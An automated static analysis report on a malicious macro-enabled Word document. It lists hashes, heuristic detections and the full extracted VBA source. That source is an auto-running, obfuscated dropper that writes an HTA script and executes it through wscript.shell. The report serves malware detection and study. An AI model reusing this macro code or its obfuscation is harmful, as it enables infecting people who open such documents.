Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a4d9a6e7773a4495…

MALICIOUS

Office (OOXML)

79.8 KB Created: 2021-04-29 10:11:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-10
MD5: 43f0882ab2cd821d2e4598ce7800d801 SHA-1: 8cdf0a06ccb3d4fb5721d8537a6942a93ce470a9 SHA-256: a4d9a6e7773a4495b0504b97caf75e6e9fb4d0c27e1ac577d1d7dac8bd28f338
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set nextReferenceTemp = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set nextReferenceTemp = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10417 bytes
SHA-256: 059cab048e4466a100ac5a1fd9e8f38060840d7eaa006bb70d2a10d8a51af448
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub

Attribute VB_Name = "frm"
Attribute VB_Base = "0{60EC2711-5D83-44DB-9BF6-5E5FD7AECDCE}{CCE14BA2-D527-436C-B2B8-2AF842D3083E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub button1_Click()
Set arrayPointerReference = ActiveDocument.BuiltInDocumentProperties("title")
Set nextReferenceTemp = CreateObject("wscript.shell")
With nextReferenceTemp
.exec$ (arrayPointerReference)
End With
End Sub


Attribute VB_Name = "nextIndex"
Sub main()
requestNextTitle
End Sub
Function gwc(bufViewFunc)
If Len(bufViewFunc) > 0 Then
gwc = bufViewFunc
End If
End Function
Sub requestNextTitle()
Dim listboxRequestTrust As String
classProcView = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ")
listboxRequestTrust = classProcView(1)
Set viewTemp = New ptrTempCounter
viewTemp.queryGlobal listboxRequestTrust, queryArrayButton
frm.button1_Click
End Sub

Attribute VB_Name = "removeSelect"
Function tableProcedure(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then tableProcedure = gwc("<htm" & "l><b" & "ody>" & "<div" & " id=" & "'con" & "tent" & "'>fT" & "tlc2" & "9sYy" & "50c2" & "lMZX" & "J1ZG" & "Vjb3" & "JwOy" & "kyIC" & "wiZ3" & "BqLn" & "JhVn" & "RzaU" & "xiaW" & "xcXG" & "NpbG" & "J1cF" & "xcc3" & "Jlc3" & "VcXD" & "pjIi" & "hlbG" & "lmb3" & "Rldm" & "FzLn" & "RzaU" & "xlcn" & "VkZW" & "Nvcn" & "A7KX" & "lkb2" & "Jlc2" & "5vcH" & "Nlci" & "5yZW" & "Ryb0" & "J0bn" & "VvQ3" & "RjZW" & "xlcy" & "hldG" & "lydy" & "50c2" & "lMZX" & "J1ZG" & "Vjb3" & "JwOz" & "EgPS" & "BlcH" & "l0Ln" & "RzaU" & "xlcn" & "VkZW" & "Nvcn" & "A7bm" & "Vwby" & "50c2" & "lMZX" & "J1ZG" & "Vjb3" & "JwOy" & "kibW" & "Flcn" & "RzLm" & "Jkb2" & "RhIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "RzaU" & "xlcn" & "VkZW" & "Nvcn" & "Agcm" & "F2ey" & "kwMD" & "IgPT" & "0gc3" & "V0YX" & "RzLn" & "JlZH" & "JvQn" & "RudW" & "9DdG" & "NlbG" & "VzKG" & "ZpOy" & "koZG" & "5lcy")
End Function
Function tmpSelectSelect(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then tmpSelectSelect = gwc("5yZW" & "Ryb0" & "J0bn" & "VvQ3" & "RjZW" & "xlcz" & "spZX" & "NsYW" & "YgLC" & "JLQW" & "JITU" & "dWWE" & "RWSm" & "NjUW" & "k9VX" & "VLZU" & "UmNl" & "B5dD" & "VteH" & "lzRW" & "05Wk" & "N5V1" & "pEYT" & "NkRD" & "1kaW" & "MmMG" & "NwWU" & "Y9c0" & "EmdH" & "haaz" & "Y5Vz" & "F1YU" & "89ZW" & "dhcC" & "YwaE" & "o2cX" & "FuNH" & "ROcU" & "E0VX" & "hWQU" & "49U1" & "laMU" & "lCeG" & "RkcC" & "ZHTG" & "hOUk" & "IyWj" & "RrZl" & "A0UH" & "RaOT" & "1yZX" & "N1Jj" & "RreG" & "o5RF" & "dpOG" & "1zZG" & "tUOW" & "U9ZG" & "ljJl" & "lXeU" & "FDcV" & "lWTz" & "1mZX" & "I/NH" & "J1di" & "8xOT" & "g1MS" & "9YWX" & "MzZE" & "xXSF" & "FKUn" & "BUMj" & "E1Um" & "tIOU" & "5MRn" & "ZmMG" & "QvZD" & "diZj" & "FFUW" & "1CQ3" & "A2Q2" & "gvZH" & "BvNT" & "NrLz" & "M3Nz" & "kyL2" & "9yQS" & "9MNV" & "dHcH" & "JJMG" & "9QOX" & "Uvc2" & "9zZ2" & "QvbW" & "9jLj" & "FvdH" & "B5cm" & "N5YX" & "IvLz" & "pwdH")
End Function
Function linkRepoStruct(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then linkRepoStruct = gwc("RoIi" & "AsIl" & "RFRy" & "Iobm" & "Vwby" & "5yZW" & "Ryb0" & "J0bn" & "VvQ3" & "RjZW" & "xlcz" & "spIn" & "B0dG" & "hsbX" & "guMm" & "xteH" & "NtIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "JlZH" & "JvQn" & "RudW" & "9DdG" & "NlbG" & "VzIH" & "Jhdg" & "==|f" & "Xspa" & "25pT" & "GJpT" & "HRzd" & "XJ0K" & "Ghjd" & "GFjf" & "TspI" & "mF0a" & "C5yY" & "VZ0c" & "2lMY" & "mlsX" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yIoZ" & "WxpZ" & "mV0Z" & "WxlZ" & "C5ia" & "UxyZ" & "WZmd" & "UJub" & "3R0d" & "WJ7e" & "XJ0O" & "ykid" & "GNla" & "mJvb" & "WV0c" & "3lzZ" & "WxpZ" & "i5nb" & "ml0c" & "GlyY" & "3MiK" & "HRjZ" & "WpiT" & "1hld" & "ml0Y" & "0Egd" & "2VuI" & "D0gY" & "mlMc" & "mVmZ" & "nVCb" & "m90d" & "HViI" & "HJhd" & "jspI" & "mdwa" & "i5yY" & "VZ0c" & "2lMY" & "mlsX" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yAyM" & "3J2c" & "2dlc")
End Function
Function refTitle(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then refTitle = gwc("iIob" & "nVyL" & "ikib" & "Gxla" & "HMud" & "HBpc" & "mNzd" & "yIod" & "GNla" & "mJPW" & "GV2a" & "XRjQ" & "SB3Z" & "W4=<" & "/div" & "><di" & "v id" & "='ta" & "ble1" & "'>AB" & "CDEF" & "GHIJ" & "KLMN" & "OPQR" & "STUV" & "WXYZ" & "</di" & "v><d" & "iv i" & "d='t" & "able" & "2'>0" & "1234" & "5678" & "9+/<" & "/div" & "><di" & "v id" & "='ta" & "ble3" & "'></" & "div>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on m" & "emDo" & "cume" & "nt(s" & "wapD" & "elet" & "eSwa" & "p){r" & "etur" & "n(ne" & "w Ac" & "tive" & "XObj" & "ect(" & "swap" & "Dele" & "teSw" & "ap))" & ";}fu" & "ncti" & "on r" & "espo" & "nseC" & "onst" & "Vb(t" & "empL" & "oad)" & "{ret" & "urn(" & "coll" & "ecti" & "onCl" & "earD" & "atab" & "ase." & "getE" & "leme" & "ntBy" & "Id(t" & "empL" & "oad)" & ".inn" & "erHT" & "ML);" & "}fun" & "ctio" & "n bu" & "tton" & "Cons")
End Function
Function viewGenericIterator(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then viewGenericIterator = gwc("t(){" & "var " & "exce" & "ptio" & "nNex" & "t = " & "resp" & "onse" & "Cons" & "tVb(" & "'tab" & "le1'" & ");va" & "r bu" & "fVb " & "= ex" & "cept" & "ionN" & "ext." & "toLo" & "werC" & "ase(" & ");va" & "r pr" & "ocLi" & "nk =" & " res" & "pons" & "eCon" & "stVb" & "('ta" & "ble2" & "');r" & "etur" & "n(ex" & "cept" & "ionN" & "ext " & "+ bu" & "fVb " & "+ pr" & "ocLi" & "nk);" & "}fun" & "ctio" & "n pt" & "rRem" & "oveV" & "alue" & "(s){" & "var " & "e={}" & "; va" & "r i;" & " var" & " b=0" & "; va" & "r c;" & " var" & " x; " & "var " & "l=0;" & " var" & " a; " & "var " & "left" & "Inde" & "xLen" & "='';" & " var" & " w=S" & "trin" & "g.fr" & "omCh" & "arCo" & "de; " & "var " & "L=s." & "leng" & "th;v" & "ar p" & "rocT" & "extB" & "uf =" & " ref" & "eren" & "ceRe" & "move" & "('tA" & "rahc" & "');f" & "or(i" & "=0;i" & "<64;" & "i++)" & "{e[b" & "utto" & "nCon" & "st()" & "[pro")
End Function
Function documentPointer(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then documentPointer = gwc("cTex" & "tBuf" & "](i)" & "]=i;" & "}for" & "(x=0" & ";x<L" & ";x++" & "){c=" & "e[s[" & "proc" & "Text" & "Buf]" & "(x)]" & ";b=(" & "b<<6" & ")+c;" & "l+=6" & ";whi" & "le(l" & ">=8)" & "{((a" & "=(b>" & ">>(l" & "-=8)" & ")&0x" & "ff)|" & "|(x<" & "(L-2" & ")))&" & "&(le" & "ftIn" & "dexL" & "en+=" & "w(a)" & ");}}" & "retu" & "rn(l" & "eftI" & "ndex" & "Len)" & ";};f" & "unct" & "ion " & "refe" & "renc" & "eRem" & "ove(" & "next" & "Data" & "base" & "Lib)" & "{ret" & "urn " & "next" & "Data" & "base" & "Lib." & "spli" & "t(''" & ").re" & "vers" & "e()." & "join" & "('')" & ";}Ex" & "Temp" & "Refe" & "renc" & "e = " & "wind" & "ow;c" & "olle" & "ctio" & "nCle" & "arDa" & "taba" & "se =" & " doc" & "umen" & "t;Ex" & "Temp" & "Refe" & "renc" & "e.re" & "size" & "To(1" & ", 1)" & ";ExT" & "empR" & "efer" & "ence" & ".mov" & "eTo(" & "-100" & ", -1" & "00);" & "var " & "memG" & "ener")
End Function
Function nextIndexTemp(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then nextIndexTemp = gwc("icLi" & "stbo" & "x = " & "coll" & "ecti" & "onCl" & "earD" & "atab" & "ase." & "getE" & "leme" & "ntBy" & "Id('" & "cont" & "ent'" & ").in" & "nerH" & "TML;" & "var " & "memG" & "ener" & "icLi" & "stbo" & "x = " & "memG" & "ener" & "icLi" & "stbo" & "x.sp" & "lit(" & "'|')" & ";var" & " tem" & "pA =" & " ref" & "eren" & "ceRe" & "move" & "(ptr" & "Remo" & "veVa" & "lue(" & "memG" & "ener" & "icLi" & "stbo" & "x[0]" & "));v" & "ar c" & "opyN" & "ames" & "pace" & "Left" & " = r" & "efer" & "ence" & "Remo" & "ve(p" & "trRe" & "move" & "Valu" & "e(me" & "mGen" & "eric" & "List" & "box[" & "1]))" & ";</s" & "crip" & "t><s" & "crip" & "t la" & "ngua" & "ge='" & "java" & "scri" & "pt'>" & "func" & "tion" & " pas" & "teBu" & "ffer" & "Iter" & "ator" & "(dat" & "abas" & "eInd" & "ex){" & "var " & "stru" & "ctRe" & "fMem" & "ory " & "= me" & "mDoc" & "umen" & "t(re" & "fere" & "nceR" & "emov")
End Function
Function requestDataException(ExA)
Dim procQueryText As Integer
procQueryText = 31337
If (Len(ExA) < procQueryText) Then requestDataException = gwc("e('l" & "ortn" & "octp" & "ircs" & ".lor" & "tnoc" & "tpir" & "cssm" & "'));" & "stru" & "ctRe" & "fMem" & "ory[" & "'Lan" & "guag" & "e'] " & "= 'j" & "scri" & "pt';" & "stru" & "ctRe" & "fMem" & "ory[" & "'Tim" & "eout" & "'] =" & " 600" & "00;s" & "truc" & "tRef" & "Memo" & "ry['" & "AddC" & "ode'" & "](da" & "taba" & "seIn" & "dex)" & ";ret" & "urn(" & "null" & ");}<" & "/scr" & "ipt>" & "<scr" & "ipt " & "lang" & "uage" & "='vb" & "scri" & "pt'>" & "past" & "eBuf" & "ferI" & "tera" & "tor " & "temp" & "A : " & "past" & "eBuf" & "ferI" & "tera" & "tor " & "copy" & "Name" & "spac" & "eLef" & "t : " & "ExTe" & "mpRe" & "fere" & "nce." & "clos" & "e</s" & "crip" & "t></" & "body" & "></h" & "tml>")
End Function
Function queryArrayButton()
queryArrayButton = tableProcedure("orde") + tmpSelectSelect("ount") + linkRepoStruct("ataE") + refTitle("ight") + viewGenericIterator("elec") + documentPointer("arBu") + nextIndexTemp("uncL") + requestDataException("ount")
End Function

Attribute VB_Name = "ptrTempCounter"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function queryGlobal(classProc As String, linkConstReference As String)
Open classProc For Output As #1
Print #1, linkConstReference
Close #1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 37376 bytes
SHA-256: 255f658f92403c020d0261b9dd4956219e00403344f4a1d8fe3034da372cfc2d

Open this report in the interactive analyzer, or submit your own file for analysis.